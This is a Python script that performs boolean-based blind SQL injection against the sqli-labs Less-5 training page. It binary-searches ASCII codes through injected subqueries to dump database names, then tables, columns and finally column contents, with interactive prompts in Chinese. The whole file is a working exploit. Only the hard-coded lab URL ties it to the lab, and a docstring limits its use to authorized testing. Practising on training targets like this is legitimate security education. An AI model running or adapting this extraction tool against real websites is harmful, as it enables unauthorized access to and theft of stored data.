import requests
# Injection point: sqli-labs Less-5 puts ``id`` inside a single-quoted string,
# so the closing quote is already in place and each boolean payload is simply
# appended after the trailing "and ".  Change the host to your own lab target.
url = "http://192.168.43.92/sqli-labs-master/Less-5/?id=' and "
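_TRUE_MARKER = "You are in"  # text sqli-labs Less-5 renders only when the injected condition is true
_MAX_CODE = 127  # per-character search covers ASCII 0..127; a byte above that collapses to 127
_REQUEST_TIMEOUT = 10  # seconds; without it a stalled target hangs the whole extraction


def _build_payload(db_name, t_name, d_name, num, row, pos, guess):
    """Return the boolean SQL condition for one oracle query (base URL excluded).

    Args:
        db_name, t_name, d_name: names spliced verbatim into the subquery; a
            quote or other SQL metacharacter in them breaks the query.
        num: what to enumerate -- 0 schema names, 1 tables of ``db_name``,
            2 columns of ``db_name``.``t_name``, 3 values of ``d_name`` in it.
        row: 0-based ``LIMIT`` offset of the row being read.
        pos: 1-based character position within that row's value.
        guess: ASCII code the character is compared against (``> guess``).

    Raises:
        ValueError: if ``num`` is not 0-3 (the original fell through to an
            unbound response variable and died with a NameError instead).
    """
    if num == 0:
        subquery = "select schema_name from information_schema.schemata"
    elif num == 1:
        subquery = ("select table_name from information_schema.tables "
                    "where table_schema='" + db_name + "'")
    elif num == 2:
        subquery = ("select column_name from information_schema.columns "
                    "where table_name='" + t_name + "' and table_schema='" + db_name + "'")
    elif num == 3:
        subquery = "select " + d_name + " from " + db_name + "." + t_name
    else:
        raise ValueError("num must be 0, 1, 2 or 3, got {!r}".format(num))
    # Format only the fixed tail: operator-supplied names may contain braces,
    # which would break ``str.format`` if the whole string were formatted.
    tail = " limit {0},1),{1},1))>{2})--+".format(row, pos, guess)
    return "(ascii(mid((" + subquery + tail


def _condition_holds(payload):
    """Send one oracle request; True if the page shows the true-branch marker.

    The check is a plain substring match, so any error or help page that
    happens to contain the marker would be misread as "true".
    """
    response = requests.get(url + payload, timeout=_REQUEST_TIMEOUT)
    return _TRUE_MARKER in response.text


def _extract_char(db_name, t_name, d_name, num, row, pos):
    """Binary-search the ASCII code of one character through the boolean oracle.

    Returns 0 when the value has no character at ``pos`` (MySQL ``ascii('')``),
    and also when every query answers "false" -- no row at that offset, or a
    target that never shows the marker -- so a dead target looks exactly like
    an empty result.
    """
    lo, hi = 0, _MAX_CODE  # invariant: the code lies in [lo, hi]
    while lo < hi:
        guess = (lo + hi) >> 1
        if _condition_holds(_build_payload(db_name, t_name, d_name, num, row, pos, guess)):
            lo = guess + 1  # code > guess
        else:
            hi = guess  # code <= guess (or NULL / no such row)
    return lo


def name(db_name, t_name, d_name, num, *, max_rows=20, max_len=19):
    """Dump one level of the schema via boolean-based blind SQL injection.

    Enumerates up to ``max_rows`` rows of up to ``max_len`` characters each,
    printing one value per line and stopping at the first empty row.  What is
    enumerated depends on ``num`` (see ``_build_payload``); the name arguments
    must be the database/table/column picked at the previous level and are
    ignored otherwise.  ``max_len`` silently truncates longer values, so raise
    it when dumping column contents.

    Every character costs about seven HTTP requests against the module-level
    ``url``.  This is an attack tool written for the sqli-labs training target;
    run it only against systems you are authorized to test.

    Raises:
        ValueError: if ``num`` is not 0-3, before any request is sent.
    """
    if num not in (0, 1, 2, 3):
        raise ValueError("num must be 0, 1, 2 or 3, got {!r}".format(num))
    for row in range(max_rows):
        chars = []
        for pos in range(1, max_len + 1):
            code = _extract_char(db_name, t_name, d_name, num, row, pos)
            if code == 0:
                break  # end of this value
            chars.append(chr(code))
        if not chars:
            break  # no row at this offset: the listing is complete
        print("".join(chars))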
def main():
    """Interactive driver: walk databases -> tables -> columns -> values.

    Each level is dumped with ``name`` and the operator is then prompted for
    the entry to descend into; the prompts and the ``name`` call sequence are
    the same as the original step-by-step script.
    """
    print("所有数据库的名称:")
    name('', '', '', 0)
    prompts = (
        "请输入要查询表的数据库名称:",
        "请输入要查询字段名的表名:",
        "请输入要查询内容的字段名:",
    )
    chosen = []  # database, table, column -- filled in one per level
    for level, prompt in enumerate(prompts, start=1):
        chosen.append(input(prompt))
        # Levels not chosen yet are passed as '' exactly as before.
        args = chosen + [''] * (3 - len(chosen))
        name(*args, level)
# Only start the interactive dump when run as a script, not on import.
if __name__ == "__main__":
    main()